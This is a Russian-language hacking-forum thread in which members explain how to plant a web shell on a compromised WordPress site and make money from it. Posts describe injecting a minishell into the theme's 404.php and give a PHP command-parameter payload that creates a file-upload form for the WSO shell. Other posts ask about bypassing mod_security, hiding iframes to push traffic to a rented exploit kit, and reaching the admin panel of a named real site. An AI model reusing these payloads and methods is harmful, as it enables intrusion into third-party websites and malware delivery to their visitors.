HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.01.2014, 01:00
ZoRKeG
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами: 7774166

Репутация: 255


По умолчанию

Цитата:

Сообщение от comynicator

Спасибо огромное всем кто ответил и разжевал.Отдельно ZoRKeG
Наконец то появилась форма загрузки
Минишелл залил в 404.php
В форму для загрузки залил wso.
А вот как найти путь к шелу(WSO)?Так понимаю где то в уплоад?
Если нада еще админки-поделюсь.

Все файлы, которые ты зальешь через ту форму загружаются в ту же папку где и сам файл с твоим мини-шеллом, с таким же названием как и у тебя на компьютере.
Иными словами, просто замени в адресной строке название файла с твоим мини-шеллом на названием твоего шелла, который ты залил
 
Ответить с цитированием

  #12  
Старый 20.01.2014, 01:00
comynicator
Новичок
Регистрация: 20.03.2012
Сообщений: 18
С нами: 7445846

Репутация: 0
По умолчанию

Все разобрался вроде.Ща еще админку с pr-3 в личку кину.
 
Ответить с цитированием

  #13  
Старый 20.01.2014, 01:00
MaCroSs
Постоянный
Регистрация: 01.04.2012
Сообщений: 796
С нами: 7428566

Репутация: 61


По умолчанию

Цитата:

Сообщение от comynicator

ифрейм код

А трафа сколько там?Знакомый связку в аренду взял,траф нужен.Можно поработать.
 
Ответить с цитированием

  #14  
Старый 20.01.2014, 01:00
comynicator
Новичок
Регистрация: 20.03.2012
Сообщений: 18
С нами: 7445846

Репутация: 0
По умолчанию

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security

Так понял нет прав на запись?Причем пробовал уже админок 20.
Есть ли способ обойти как то этот мод секюрити?Или какие другие способы заливки полноценного шелла.Минишелл могу прописать в любом php файле,а если сразу кудато сохранить код допустим WSO будет ли возможность его выполнить?
А по поводу фрейма код в шапку пихать?
 
Ответить с цитированием

  #15  
Старый 20.01.2014, 01:00
comynicator
Новичок
Регистрация: 20.03.2012
Сообщений: 18
С нами: 7445846

Репутация: 0
По умолчанию

Цитата:

Сообщение от MaCroSs

А трафа сколько там?Знакомый связку в аренду взял,траф нужен.Можно поработать.

На щет трафика-не смотрел точно.Щас интересует нашарится шеллы лить.В ознакомительных целях.
Блоги 95% юсовские.Какое количество трафа вобще интересует?Может найду что с посещалкой посотрудничать не против.
 
Ответить с цитированием

  #16  
Старый 20.01.2014, 01:00
MaCroSs
Постоянный
Регистрация: 01.04.2012
Сообщений: 796
С нами: 7428566

Репутация: 61


По умолчанию

Цитата:

Сообщение от comynicator

На щет трафика-не смотрел точно.Щас интересует нашарится шеллы лить.В ознакомительных целях.
Блоги 95% юсовские.Какое количество трафа вобще интересует?Может найду что с посещалкой посотрудничать не против.

Отписал.
 
Ответить с цитированием

  #17  
Старый 02.11.2015, 01:00
Edward_CSS5
Новичок
Регистрация: 12.03.2015
Сообщений: 2
С нами: 5880566

Репутация: 0
По умолчанию

Цитата:

Сообщение от ZoRKeG

1) Да, ты сможешь вставить свой фрейм через шаблоны. Если код фрейма не появится на странице - может быть несколько проблем:
а) Страницы кешируются, для этого найди папку с кэшем и удали её.
б) Ты вставил код не в тот шаблон.
в) Файл шаблона не может быть отредактирован, так-как защищен от записи.
Примечание: я не рекомендую его использовать, так-как гугл и яндекс плохо реагируют на это, а так же, некоторые антивирусы могут тоже ругаться на него.

2) Да, залить шелл вполне возможно. Для этого перейди в режим редактирования шаблона, выбери любой файл шаблона, к примеру 404.php и вставь в начало кода такую строчку:

code:


Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:

code:

?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5

3) Если на сайте хорошие показатели Тиц и ПР - можно выжать деньги, рекомендую использовать сайты с тиц не меньше чем 100 и пр не меньше чем 1, желательно, чтобы пр был 3 и больше, но все же. Так же рекомендовано, чтобы сайт был в яндекс каталоге и DMOZ, а так же имел более 100 проиндексированных страниц в яндексе, все эти параметры повышают число $$$, которые ты с них выжмешь.
Так же можно сливать трафик с гугла и яндекса или же с других поисковых системах. Если понадобится код - могу написать под твои потребности, да и много кода там не понадобится.

Если что-то не понятно или требуется помощь - пиши, буду рад помочь.
------------------------------------------------------------------------------------------------------
UpDate:

Немного добавлю от себя, если все же нужно вставить фрейм - лучше его ещё запихнуть под невидимый блок:

Так-как на странице он будет отображаться как небольшой квадратик.

Как можно пофиксить php upload? То есть
Я понимаю тема старая, и поднимаю по пустяку, но всё-же интересно знать.
 
Ответить с цитированием

  #18  
Старый 03.12.2015, 01:00
otoko212
Новичок
Регистрация: 28.07.2015
Сообщений: 4
С нами: 5681846

Репутация: 0
По умолчанию

здравствуйте, подскажите пожалуйста как найти доступ к админ панели сайта на wordpress
www.baby-smile.ru
Стандартный путь что-то не работает, видимо изменен как-то.
Спасибо.
 
Ответить с цитированием

  #19  
Старый 04.12.2015, 01:00
svirid
Участник форума
Регистрация: 01.07.2009
Сообщений: 194
С нами: 8875766

Репутация: 21
По умолчанию

Цитата:

Сообщение от otoko212

здравствуйте, подскажите пожалуйста как найти доступ к админ панели сайта на wordpress
www.baby-smile.ru
Стандартный путь что-то не работает, видимо изменен как-то.
Спасибо.

Может потому что это не wordpress
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...